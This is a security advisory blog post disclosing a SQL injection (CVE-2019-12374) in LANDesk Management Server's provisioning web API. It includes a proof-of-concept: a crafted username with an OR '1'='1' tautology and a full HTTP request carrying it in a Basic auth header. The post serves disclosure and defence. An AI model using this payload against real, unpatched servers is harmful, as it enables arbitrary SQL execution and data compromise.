[CVE-2019-12374] LANDesk Management Server - SQL Injection

SQL Injection vulnerability found in LDMS 10.0.1.168 Service Update 5 due to improper username sanitization.

May 25, 2019

A SQL injection vulnerability has been identified in the web API endpoint located at https://<coreserver>/landesk/managementsuite/core/provisioning.secure/ProvisioningSecure.asmx.

This vulnerability is present within the Provisioning.Secure.dll utilized by this API endpoint. If we decompile this DLL, the vulnerability can be clearly seen within 2 methods.

Provisioning.Secure.ProvUserValidator.UsernameExists(string strUserName)
Provisioning.Secure.ProvUserValidator.UsernameExists.png
Provisioning.Secure.ProvUserValidator.GetUserIdn(string strUserName)
Provisioning.Secure.ProvuserValidator.GetUserIdn.png

This vulnerability is partially mitigated by the protections provided by IIS authentication. In most cases, only valid usernames can get through. However, these restrictions are not infallible. If the IIS server is improperly configured (i.e. anonymous authentication is allowed, other authentication methods are disabled), or if a specially crafted username is created, an attacker could leverage this condition to execute arbitrary SQL statements on the LANDesk server.

To confirm this, I first created a user named "username' or '1'='1". I then created a Python script to authenticate to the endpoint using Basic HTTP authentication. This script generated the following HTTP request.


POST /landesk/managementsuite/core/provisioning.secure/ProvisioningSecure.asmx?op=CheckCredentials
server <coreserver>
content-type: text/xml; charset=utf-8
Authorization: Basic bGl0dGxlYm9iYnl0YWJsZXMnIE9SICcxJz0nMTpodHRwczovL3hrY2QuY29tLzMyNy8=
Content-Length: 278

<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <CheckCredentials xmlns="http://tempuri.org/" />
  </soap12:Body>
</soap12:Envelope>

When received, the server first grabs the Authorization HTTP header. It then base64 decodes the string, and passes it into the username validation method. The username validation method passes the username through both vulnerable methods, executing the injected SQL statement twice.

The vendor has been notified of this vulnerability, and confirmed that LDMS version 10.0.1.168 SU 5 is no longer supported. Thus, this vulnerability will not be patched.

Return to blog